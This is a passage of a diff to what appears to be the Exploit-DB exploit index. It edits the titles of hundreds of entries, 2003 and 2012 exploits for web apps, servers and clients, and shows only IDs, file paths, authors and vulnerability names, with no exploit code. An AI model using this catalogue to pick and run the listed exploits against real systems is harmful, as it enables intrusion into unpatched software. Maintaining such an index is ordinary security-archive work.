6.0/7.0 Style Sheet Denial of Service",2003-02-25,Jocke,unix,dos,0 22287,platforms/unix/dos/22287.html,"Netscape 7.0 JavaScript Regular Expression Denial of Service",2003-02-25,dwm,unix,dos,0 22288,platforms/windows/remote/22288.txt,"Microsoft Internet Explorer 5/6 Self Executing HTML File",2003-02-25,http-equiv,windows,remote,0 @@ -19549,10 +19549,10 @@ id,file,description,date,author,platform,type,port 22292,platforms/unix/remote/22292.pl,"Frisk F-Prot Antivirus 3.12 b Command Line Scanner Buffer Overflow",2003-02-26,"Knud Erik Hojgaard",unix,remote,0 22293,platforms/php/webapps/22293.txt,"E-theni Remote Include Command Execution",2003-01-06,frog,php,webapps,0 22294,platforms/linux/dos/22294.c,"TCPDump 3.x Malformed ISAKMP Packet Denial of Service",2003-03-01,"The Salvia Twist",linux,dos,0 -22295,platforms/php/webapps/22295.txt,"Invision Board 1.1.1 ipchat.php Remote File Include",2003-02-27,frog,php,webapps,0 +22295,platforms/php/webapps/22295.txt,"Invision Board 1.1.1 ipchat.php Remote File Inclusion",2003-02-27,frog,php,webapps,0 22296,platforms/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x Messages Information Disclosure",2003-02-28,"Martin Eiszner",multiple,remote,0 22297,platforms/php/webapps/22297.pl,"Typo3 3.5 b5 Showpic.php File Enumeration",2003-02-28,"Martin Eiszner",php,webapps,0 -22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 Translations.php Remote File Include",2003-02-28,"Martin Eiszner",php,webapps,0 +22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 Translations.php Remote File Inclusion",2003-02-28,"Martin Eiszner",php,webapps,0 22300,platforms/php/webapps/22300.txt,"WordPress Easy Webinar Plugin - Blind SQL Injection",2012-10-28,"Robert Cooper",php,webapps,0 22301,platforms/windows/remote/22301.html,"Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF",2012-10-28,b33f,windows,remote,0 22302,platforms/windows/dos/22302.rb,"hMailServer 5.3.3 IMAP Remote Crash PoC",2012-10-28,"John Smith",windows,dos,0 @@ -19572,8 +19572,8 @@ id,file,description,date,author,platform,type,port 22314,platforms/unix/remote/22314.c,"Sendmail 8.12.x Header Processing Buffer Overflow (2)",2003-03-02,bysin,unix,remote,0 22315,platforms/php/webapps/22315.pl,"Typo3 3.5 b5 HTML Hidden Form Field Information Disclosure Weakness (1)",2003-02-28,"Martin Eiszner",php,webapps,0 22316,platforms/php/webapps/22316.pl,"Typo3 3.5 b5 HTML Hidden Form Field Information Disclosure Weakness (2)",2003-02-28,"Martin Eiszner",php,webapps,0 -22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Include",2003-03-03,frog,php,webapps,0 -22318,platforms/php/webapps/22318.txt,"Webchat 0.77 Defines.php Remote File Include",2003-03-03,frog,php,webapps,0 +22317,platforms/php/webapps/22317.txt,"GTCatalog 0.8.16/0.9 - Remote File Inclusion",2003-03-03,frog,php,webapps,0 +22318,platforms/php/webapps/22318.txt,"Webchat 0.77 Defines.php Remote File Inclusion",2003-03-03,frog,php,webapps,0 22319,platforms/hardware/remote/22319.txt,"HP JetDirect Printer SNMP JetAdmin Device Password Disclosure",2003-03-03,"Sven Pechler",hardware,remote,0 22320,platforms/linux/local/22320.c,"XFree86 4.2 XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0 22321,platforms/linux/local/22321.c,"XFree86 4.2 XLOCALEDIR Local Buffer Overflow (2)",2003-03-03,"Guilecool & deka",linux,local,0 @@ -19648,7 +19648,7 @@ id,file,description,date,author,platform,type,port 22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption",2003-03-21,"Auriemma Luigi",windows,dos,0 22396,platforms/php/webapps/22396.txt,"WordPress bbpress Plugin - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 -22398,platforms/php/webapps/22398.php,"Invision Power Board <= 3.3.4 - 'unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 +22398,platforms/php/webapps/22398.php,"Invision Power Board 3.3.4 - 'unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent XSS",2012-11-01,"CYBSEC Labs",php,webapps,0 22401,platforms/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash PoC",2012-11-01,"Jean Pascal Pereira",windows,dos,0 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash PoC",2012-11-01,coolkaveh,windows,dos,0 @@ -19678,7 +19678,7 @@ id,file,description,date,author,platform,type,port 22427,platforms/php/webapps/22427.txt,"WordPress All Video Gallery 1.1 - SQL Injection",2012-11-02,"Ashiyane Digital Security Team",php,webapps,0 22521,platforms/php/webapps/22521.c,"XMB Forum 1.8 Member.php SQL Injection",2003-04-22,zeez@bbugs.org,php,webapps,0 22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection",2012-11-02,Juno_okyo,php,webapps,0 -22430,platforms/php/webapps/22430.txt,"PrestaShop <= 1.5.1 Persistent XSS",2012-11-02,"David Sopas",php,webapps,0 +22430,platforms/php/webapps/22430.txt,"PrestaShop 1.5.1 Persistent XSS",2012-11-02,"David Sopas",php,webapps,0 22431,platforms/php/webapps/22431.txt,"achievo 1.4.5 - Multiple Vulnerabilities (1)",2012-11-02,"Canberk BOLAT",php,webapps,0 22432,platforms/windows/remote/22432.rb,"HP Intelligent Management Center UAM Buffer Overflow",2012-11-04,Metasploit,windows,remote,0 22433,platforms/linux/dos/22433.pl,"Monkey HTTP Daemon 0.4/0.5/0.6 Excessive POST Data Buffer Overflow",2003-03-24,"Matthew Murphy",linux,dos,0 @@ -19722,7 +19722,7 @@ id,file,description,date,author,platform,type,port 22471,platforms/unix/remote/22471.txt,"Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)",2003-04-07,noir,unix,remote,0 22472,platforms/multiple/remote/22472.txt,"Vignette StoryServer 4.1 Sensitive Stack Memory Information Disclosure",2003-04-07,@stake,multiple,remote,0 22473,platforms/php/webapps/22473.txt,"Coppermine Photo Gallery 1.0 PHP Code Injection",2003-04-07,"Berend-Jan Wever",php,webapps,0 -22474,platforms/php/webapps/22474.txt,"Py-Membres 4.0 - Remote SQL Injection",2003-04-07,frog,php,webapps,0 +22474,platforms/php/webapps/22474.txt,"Py-Membres 4.0 - SQL Injection",2003-04-07,frog,php,webapps,0 22475,platforms/unix/remote/22475.txt,"Amavis 0.1.6 Header Parsing Mail Relaying Weakness",2003-04-08,"Phil Cyc",unix,remote,0 22476,platforms/windows/remote/22476.txt,"QuickFront 1.0 File Disclosure",2003-04-09,"Jan Kachlik",windows,remote,0 22477,platforms/php/webapps/22477.txt,"PHPay 2.2 - Multiple Path Disclosure Vulnerabilities",2003-04-09,"Ahmet Sabri ALPER",php,webapps,0 @@ -19738,7 +19738,7 @@ id,file,description,date,author,platform,type,port 22487,platforms/asp/webapps/22487.txt,"Web Wiz Site News 3.6 Information Disclosure",2003-04-14,drG4njubas,asp,webapps,0 22488,platforms/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 site.ini Information Disclosure",2003-04-15,"gregory Le Bras",windows,remote,0 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 -22490,platforms/multiple/webapps/22490.txt,"ZPanel <= 10.0.1 - CSRF & XSS & SQLi & Password Reset",2012-11-05,pcsjj,multiple,webapps,0 +22490,platforms/multiple/webapps/22490.txt,"ZPanel 10.0.1 - CSRF & XSS & SQLi & Password Reset",2012-11-05,pcsjj,multiple,webapps,0 22491,platforms/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross-Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22501,platforms/php/webapps/22501.txt,"Xonic.ru News 1.0 script.php Remote Command Execution",2003-03-31,"DWC Gr0up",php,webapps,0 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 @@ -19763,10 +19763,10 @@ id,file,description,date,author,platform,type,port 22514,platforms/multiple/dos/22514.txt,"Mod_NTLM 0.x - Authorization Format String",2003-04-21,"Matthew Murphy",multiple,dos,0 22515,platforms/windows/remote/22515.txt,"AN HTTPD 1.x Count.pl Directory Traversal",2003-04-22,"Matthew Murphy",windows,remote,0 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,windows,dos,0 -22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 Index.php Remote SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 +22517,platforms/php/webapps/22517.txt,"OpenBB 1.0/1.1 Index.php SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22518,platforms/windows/dos/22518.html,"Microsoft Shlwapi.dll 6.0.2800.1106 Malformed HTML Form Tag DoS",2003-04-22,"Ramon Pinuaga Cascales",windows,dos,0 -22519,platforms/php/webapps/22519.txt,"OpenBB 1.0/1.1 Board.php Remote SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 -22520,platforms/php/webapps/22520.txt,"OpenBB 1.0/1.1 Member.php Remote SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 +22519,platforms/php/webapps/22519.txt,"OpenBB 1.0/1.1 Board.php SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 +22520,platforms/php/webapps/22520.txt,"OpenBB 1.0/1.1 Member.php SQL Injection",2003-04-22,"Albert Puigsech Galicia",php,webapps,0 22522,platforms/multiple/remote/22522.pl,"Web Protector 2.0 Trivial Encryption Weakness",2003-04-22,rjfix,multiple,remote,0 22570,platforms/windows/remote/22570.java,"Microsoft Windows Media Player 7.1 Skin File Code Execution",2003-05-07,"Jelmer Kuperus",windows,remote,0 22571,platforms/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 Normal_HTML.CGI Command Execution",2003-05-07,"Revin Aldi",cgi,webapps,0 @@ -19793,7 +19793,7 @@ id,file,description,date,author,platform,type,port 22544,platforms/cfm/webapps/22544.txt,"Macromedia ColdFusion MX 6.0 - Error Message Path Disclosure",2003-04-26,"Network Intelligence",cfm,webapps,0 22545,platforms/cgi/webapps/22545.pl,"Mike Bobbitt Album.PL 0.61 - Remote Command Execution",2003-04-26,aresu@bosen.net,cgi,webapps,0 22546,platforms/windows/remote/22546.txt,"Opera 7.0/7.10 JavaScript Console Single Quote Attribute Injection",2003-04-28,nesumin,windows,remote,0 -22547,platforms/php/webapps/22547.php,"Invision Power Board <= 3.3.4 unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 +22547,platforms/php/webapps/22547.php,"Invision Power Board 3.3.4 unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 22548,platforms/php/webapps/22548.txt,"Xivo 1.2 - Arbitrary File Download",2012-11-07,Mr.Un1k0d3r,php,webapps,0 22549,platforms/hardware/webapps/22549.txt,"AVerCaster Pro RS3400 Web Server Directory Traversal",2012-11-07,"Patrick Saladino",hardware,webapps,0 22550,platforms/windows/dos/22550.pl,"Opera 6.0.x/7.0 Long File Name Remote Heap Corruption",2003-04-28,"imagine & nesumin",windows,dos,0 @@ -19833,8 +19833,8 @@ id,file,description,date,author,platform,type,port 22586,platforms/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 Resource Exhaustion Denial of Service (2)",2003-05-11,rash,windows,dos,0 22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 Malformed GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 22588,platforms/cgi/webapps/22588.txt,"Happymall E-Commerce Software 4.3/4.4 Normal_HTML.CGI Cross-Site Scripting",2003-05-12,"Julio Cesar",cgi,webapps,0 -22589,platforms/php/webapps/22589.txt,"PHP-Nuke 5.x/6.x Web_Links Module - Remote SQL Injection",2003-05-12,"Albert Puigsech Galicia",php,webapps,0 -22590,platforms/php/webapps/22590.txt,"netOffice Dwins <= 1.4p3 SQL Injection",2012-11-09,dun,php,webapps,0 +22589,platforms/php/webapps/22589.txt,"PHP-Nuke 5.x/6.x Web_Links Module - SQL Injection",2003-05-12,"Albert Puigsech Galicia",php,webapps,0 +22590,platforms/php/webapps/22590.txt,"netOffice Dwins 1.4p3 SQL Injection",2012-11-09,dun,php,webapps,0 22591,platforms/windows/dos/22591.txt,"Microsoft Office Excel 2007 - WriteAV Crash PoC",2012-11-09,coolkaveh,windows,dos,0 22592,platforms/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 Normal_HTML.CGI File Disclosure",2003-05-12,"Julio Cesar",cgi,webapps,0 22593,platforms/windows/remote/22593.html,"Yahoo! Voice Chat ActiveX Control 1.0.0.43 - Buffer Overflow",2003-05-12,cesaro,windows,remote,0 @@ -19856,7 +19856,7 @@ id,file,description,date,author,platform,type,port 22609,platforms/windows/remote/22609.txt,"Snowblind 1.0/1.1 Web Server File Disclosure",2003-05-16,euronymous,windows,remote,0 22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 HTTP GET Request Buffer Overflow",2003-05-16,euronymous,windows,dos,0 22611,platforms/multiple/remote/22611.txt,"Netscape Enterprise Server 3.x/4.x PageServices Information Disclosure",1998-08-16,anonymous,multiple,remote,0 -22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 Header.php Remote File Include",2003-05-17,ScriptSlave@gmx.net,php,webapps,0 +22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 Header.php Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0 22613,platforms/freebsd/local/22613.pl,"Maelstrom Server 3.0.x Argument Buffer Overflow (1)",2003-05-20,"Luca Ercoli",freebsd,local,0 22614,platforms/freebsd/local/22614.c,"Maelstrom Server 3.0.x Argument Buffer Overflow (2)",2003-05-23,ph4nt0m,freebsd,local,0 22615,platforms/freebsd/local/22615.c,"Maelstrom Server 3.0.x Argument Buffer Overflow (3)",2003-05-20,CMN,freebsd,local,0 @@ -19885,7 +19885,7 @@ id,file,description,date,author,platform,type,port 22638,platforms/irix/dos/22638.txt,"IRIX 5.x/6.x MediaMail HOME Environment Variable Buffer Overflow",2003-05-23,bazarr@ziplip.com,irix,dos,0 22639,platforms/asp/webapps/22639.txt,"IISProtect 2.1/2.2 Web Administration Interface SQL Injection",2003-05-23,Gyrniff,asp,webapps,0 22640,platforms/linux/local/22640.c,"UML_NET Integer Mismanagement Code Execution",2003-05-23,ktha@hushmail.com,linux,local,0 -22641,platforms/php/webapps/22641.txt,"BLNews 2.1.3 - Remote File Include",2003-05-24,Over_G,php,webapps,0 +22641,platforms/php/webapps/22641.txt,"BLNews 2.1.3 - Remote File Inclusion",2003-05-24,Over_G,php,webapps,0 22642,platforms/php/webapps/22642.txt,"Ultimate PHP Board 1.9 admin_iplog.php Arbitrary PHP Execution",2003-05-24,euronymous,php,webapps,0 22643,platforms/linux/local/22643.pl,"Ifenslave 0.0.7 Argument Local Buffer Overflow (1)",2003-05-26,jlanthea,linux,local,0 22644,platforms/linux/local/22644.c,"Ifenslave 0.0.7 Argument Local Buffer Overflow (2)",2003-05-26,jsk,linux,local,0 @@ -19900,7 +19900,7 @@ id,file,description,date,author,platform,type,port 22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 Crash PoC",2012-11-12,"Mada R Perdhana",windows,dos,0 22654,platforms/php/webapps/22654.txt,"bananadance wiki b2.2 - Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,php,webapps,0 22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 Crash PoC",2012-11-12,coolkaveh,windows,dos,0 -22656,platforms/php/webapps/22656.py,"vBulletin vBay <= 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps,0 +22656,platforms/php/webapps/22656.py,"vBulletin vBay 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps,0 22657,platforms/multiple/remote/22657.rb,"Java Applet JAX-WS Remote Code Execution",2012-11-13,Metasploit,multiple,remote,0 22658,platforms/linux/remote/22658.pl,"Batalla Naval 1.0 4 - Remote Buffer Overflow (1)",2003-05-26,wsxz,linux,remote,0 22659,platforms/linux/remote/22659.c,"Batalla Naval 1.0 4 - Remote Buffer Overflow (2)",2003-05-26,jsk,linux,remote,0 @@ -19916,7 +19916,7 @@ id,file,description,date,author,platform,type,port 22669,platforms/cgi/webapps/22669.txt,"Bandmin 1.4 - Cross-Site Scripting",2003-05-28,"silent needel",cgi,webapps,0 22670,platforms/windows/dos/22670.c,"Microsoft IIS 5 WebDAV - PROPFIND and SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0 22671,platforms/php/webapps/22671.txt,"Webfroot Shoutbox 2.32 URI Parameter File Disclosure",2003-05-29,pokleyzz,php,webapps,0 -22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Include",2003-05-29,pokleyzz,php,webapps,0 +22672,platforms/php/webapps/22672.txt,"Cafelog b2 0.6 - Remote File Inclusion",2003-05-29,pokleyzz,php,webapps,0 22673,platforms/asp/webapps/22673.txt,"Philboard 1.14 philboard_admin.ASP Authentication Bypass",2003-05-29,aresu@bosen.net,asp,webapps,0 22674,platforms/windows/remote/22674.txt,"M-TECH P-Synch 6.2.5 Path Disclosure",2003-05-29,JeiAr,windows,remote,0 22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authentication SQL Injection",2003-05-29,pokleyzz,php,webapps,0 @@ -19929,7 +19929,7 @@ id,file,description,date,author,platform,type,port 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow Vulnerabilities",2012-11-13,Vulnerability-Lab,windows,dos,0 -22686,platforms/php/remote/22686.rb,"Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution",2012-11-13,Metasploit,php,remote,0 +22686,platforms/php/remote/22686.rb,"Invision IP.Board 3.3.4 unserialize() PHP Code Execution",2012-11-13,Metasploit,php,remote,0 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0 22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 nph-psa.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 @@ -19951,7 +19951,7 @@ id,file,description,date,author,platform,type,port 22705,platforms/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 Expanded.php Remote Directory Traversal",2003-06-02,_6mO_HaCk,php,webapps,0 22706,platforms/windows/dos/22706.asm,"Crob FTP Server 2.50.4 - Remote Username Format String",2003-06-02,"Luca Ercoli",windows,dos,0 22707,platforms/windows/dos/22707.txt,"Novell Groupwise Internet Agent LDAP BIND Request Overflow",2012-11-14,"Francis Provencher",windows,dos,0 -22708,platforms/php/webapps/22708.txt,"dotproject <= 2.1.6 - Remote File Inclusion",2012-11-14,dun,php,webapps,0 +22708,platforms/php/webapps/22708.txt,"dotproject 2.1.6 - Remote File Inclusion",2012-11-14,dun,php,webapps,0 22709,platforms/php/webapps/22709.txt,"Narcissus Remote Command Execution",2012-11-14,dun,php,webapps,0 22713,platforms/php/webapps/22713.txt,"MYRE Realty Manager - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22710,platforms/php/webapps/22710.txt,"friendsinwar FAQ Manager SQL Injection (authbypass)",2012-11-14,d3b4g,php,webapps,0 @@ -19960,7 +19960,7 @@ id,file,description,date,author,platform,type,port 22714,platforms/windows/remote/22714.rb,"Oracle Database Client System Analyzer Arbitrary File Upload",2012-11-15,Metasploit,windows,remote,0 22715,platforms/php/webapps/22715.txt,"WebChat 2.0 Users.php Database Username Disclosure Weakness",2003-06-02,"Rynho Zeros Web",php,webapps,0 22716,platforms/php/webapps/22716.txt,"WebChat 2.0 Users.php Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",php,webapps,0 -22717,platforms/php/webapps/22717.txt,"SPChat 0.8 Module Remote File Include",2003-06-02,"Rynho Zeros Web",php,webapps,0 +22717,platforms/php/webapps/22717.txt,"SPChat 0.8 Module Remote File Inclusion",2003-06-02,"Rynho Zeros Web",php,webapps,0 22718,platforms/windows/dos/22718.c,"Pi3Web 2.0.2 SortName Buffer Overflow",2003-06-02,posidron,windows,dos,0 22719,platforms/linux/local/22719.pl,"kon2 - Local Buffer Overflow (1)",2003-06-03,wsxz,linux,local,0 22720,platforms/linux/local/22720.c,"kon2 - Local Buffer Overflow (2)",2003-06-03,c0ntex,linux,local,0 @@ -19992,7 +19992,7 @@ id,file,description,date,author,platform,type,port 22747,platforms/asp/webapps/22747.txt,"MaxWebPortal 1.30 - Remote Database Disclosure",2003-06-06,JeiAr,asp,webapps,0 22748,platforms/linux/local/22748.c,"Xaos 3.0 Language Option Local Buffer Overflow",2003-06-06,bazarr@ziplip.com,linux,local,0 22749,platforms/novell/dos/22749.txt,"Novell Netware 6.0_eDirectory 8.7 HTTPSTK.NLM Remote Abend",2003-06-06,"Cheese Head",novell,dos,0 -22750,platforms/php/webapps/22750.txt,"Zentrack 2.2/2.3/2.4 Index.php Remote File Include",2003-06-06,farking,php,webapps,0 +22750,platforms/php/webapps/22750.txt,"Zentrack 2.2/2.3/2.4 Index.php Remote File Inclusion",2003-06-06,farking,php,webapps,0 22751,platforms/multiple/remote/22751.txt,"Mozilla 1.x_opera 6/7 Timed Document.Write Method Cross Domain Policy",2003-06-07,meme-boi,multiple,remote,0 22752,platforms/java/webapps/22752.txt,"H-Sphere 2.x HTML Template Inclusion Cross-Site Scripting Vulnerabilities",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",java,webapps,0 22753,platforms/cgi/remote/22753.pl,"MNOGoSearch 3.1.20 - Search.CGI UL Buffer Overflow (1)",2003-06-10,pokleyzz,cgi,remote,0 @@ -20005,7 +20005,7 @@ id,file,description,date,author,platform,type,port 22760,platforms/php/webapps/22760.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Account Configuration Modification",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22761,platforms/php/webapps/22761.txt,"PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps,0 22762,platforms/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22829,platforms/php/webapps/22829.txt,"webid <= 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 +22829,platforms/php/webapps/22829.txt,"webid 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 User.php UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",php,webapps,0 22768,platforms/linux/local/22768.pl,"ATFTP 0.7 - Timeout Command Line Argument Local Buffer Overflow",2003-06-06,"Julien LANTHEA",linux,local,0 22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server File Disclosure",2003-06-13,"Peter Winter-Smith",windows,remote,0 @@ -20068,7 +20068,7 @@ id,file,description,date,author,platform,type,port 22825,platforms/windows/dos/22825.c,"Armida Databased Web Server 1.0 - Remote GET Request Denial of Service",2003-06-23,posidron,windows,dos,0 22826,platforms/php/webapps/22826.txt,"VisNetic WebMail 5.8.6 .6 - Information Disclosure",2003-06-23,posidron,php,webapps,0 22827,platforms/windows/remote/22827.txt,"Compaq Web-Based Management Agent Remote File Verification",2003-06-23,"Ian Vitek",windows,remote,0 -22828,platforms/php/webapps/22828.txt,"WeBid <= 1.0.5 - Cross-Site Scripting Vulnerabilities",2012-11-19,"Woody Hughes",php,webapps,0 +22828,platforms/php/webapps/22828.txt,"WeBid 1.0.5 - Cross-Site Scripting Vulnerabilities",2012-11-19,"Woody Hughes",php,webapps,0 22830,platforms/linux/remote/22830.c,"LBreakOut2 2.x Login Remote Format String",2003-06-24,V9,linux,remote,0 22831,platforms/freebsd/dos/22831.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (1)",2003-06-24,dodo,freebsd,dos,0 22832,platforms/freebsd/remote/22832.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (2)",2003-06-24,dodo,freebsd,remote,0 @@ -20129,7 +20129,7 @@ id,file,description,date,author,platform,type,port 22884,platforms/linux/local/22884.c,"Tower Toppler 0.96 HOME Environment Variable Local Buffer Overflow",2003-07-08,FBHowns,linux,local,0 22885,platforms/asp/webapps/22885.asp,"QuadComm Q-Shop 2.5 Failure To Validate Credentials",2003-07-09,G00db0y,asp,webapps,0 22886,platforms/php/webapps/22886.txt,"ChangshinSoft EZTrans Server Download.php Directory Traversal",2003-07-09,"SSR Team",php,webapps,0 -22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 Mainfile.php Remote File Include",2003-07-10,theblacksheep,php,webapps,0 +22887,platforms/php/webapps/22887.txt,"PHPForum 2.0 RC1 Mainfile.php Remote File Inclusion",2003-07-10,theblacksheep,php,webapps,0 22888,platforms/asp/webapps/22888.pl,"Virtual Programming VP-ASP 5.00 shopexd.asp SQL Injection (1)",2003-07-10,"TioEuy & AresU",asp,webapps,0 22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 shopexd.asp SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0 22890,platforms/freebsd/remote/22890.pl,"cftp 0.12 Banner Parsing Buffer Overflow",2003-07-10,inv[at]dtors,freebsd,remote,0 @@ -20138,7 +20138,7 @@ id,file,description,date,author,platform,type,port 22893,platforms/linux/remote/22893.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x FTP Gateway Buffer Overflow",2003-07-11,V9,linux,remote,0 22894,platforms/linux/remote/22894.c,"University of Minnesota Gopherd 2.0.x/2.3/3.0.x GSisText Buffer Overflow",2003-07-11,V9,linux,remote,0 22895,platforms/asp/webapps/22895.txt,"ASP-DEV Discussion Forum 2.0 Admin Directory Weak Default Permissions",2003-07-13,G00db0y,asp,webapps,0 -22896,platforms/php/webapps/22896.txt,"HTMLToNuke Cross-Site Scripting Vulnerabilty",2003-07-13,JOCANOR,php,webapps,0 +22896,platforms/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,php,webapps,0 22897,platforms/linux/dos/22897.c,"Twilight WebServer 1.3.3.0 - GET Request Buffer Overflow",2003-07-07,posidron,linux,dos,0 22898,platforms/hardware/remote/22898.txt,"Asus AAM6330BI/AAM6000EV ADSL Router Information Disclosure",2003-07-14,cw,hardware,remote,0 22899,platforms/windows/dos/22899.txt,"StarSiege Tribes Server Denial of Service (1)",2003-06-10,st0ic,windows,dos,0 @@ -20155,13 +20155,13 @@ id,file,description,date,author,platform,type,port 22910,platforms/php/webapps/22910.html,"Splatt Forum 3/4 Post Icon HTML Injection",2003-07-15,Lethalman,php,webapps,0 22911,platforms/php/local/22911.php,"PHP 4.3.x Undefined Safe_Mode_Include_Dir Safemode Bypass",2003-07-16,"Michal Krause",php,local,0 22912,platforms/unix/local/22912.c,"IBM UniVerse 10.0.0.9 - uvadmsh Privilege Escalation",2003-07-16,kf,unix,local,0 -22942,platforms/php/webapps/22942.txt,"WebCalendar 0.9.x - Local File Include Information Disclosure",2003-07-21,noconflic,php,webapps,0 +22942,platforms/php/webapps/22942.txt,"WebCalendar 0.9.x - Local File Inclusion Information Disclosure",2003-07-21,noconflic,php,webapps,0 22943,platforms/linux/local/22943.c,"Top 1.x/2.0 Home Environment Variable Local Buffer Overflow",2003-07-22,UHAGr,linux,local,0 22944,platforms/windows/remote/22944.txt,"Savant Web Server 3.1 CGITest.HTML Cross-Site Scripting",2003-07-21,dr_insane,windows,remote,0 22945,platforms/windows/dos/22945.txt,"Savant Webserver 3.1 - Denial of Service Vulnerabilities",2003-07-21,dr_insane,windows,dos,0 22946,platforms/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 Plain Text Password",2003-07-22,hanez,windows,local,0 22947,platforms/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 Administrative Interface Long Request Router DoS",2003-07-21,"David F.Madrid",hardware,dos,0 -22948,platforms/php/webapps/22948.txt,"MoreGroupWare 0.6.8 WEBMAIL2_INC_DIR Remote File Include",2003-07-21,"phil dunn",php,webapps,0 +22948,platforms/php/webapps/22948.txt,"MoreGroupWare 0.6.8 WEBMAIL2_INC_DIR Remote File Inclusion",2003-07-21,"phil dunn",php,webapps,0 22949,platforms/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 CGI2Perl.NLM Buffer Overflow",2003-07-23,"Uffe Nielsen",netware,dos,0 22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router - 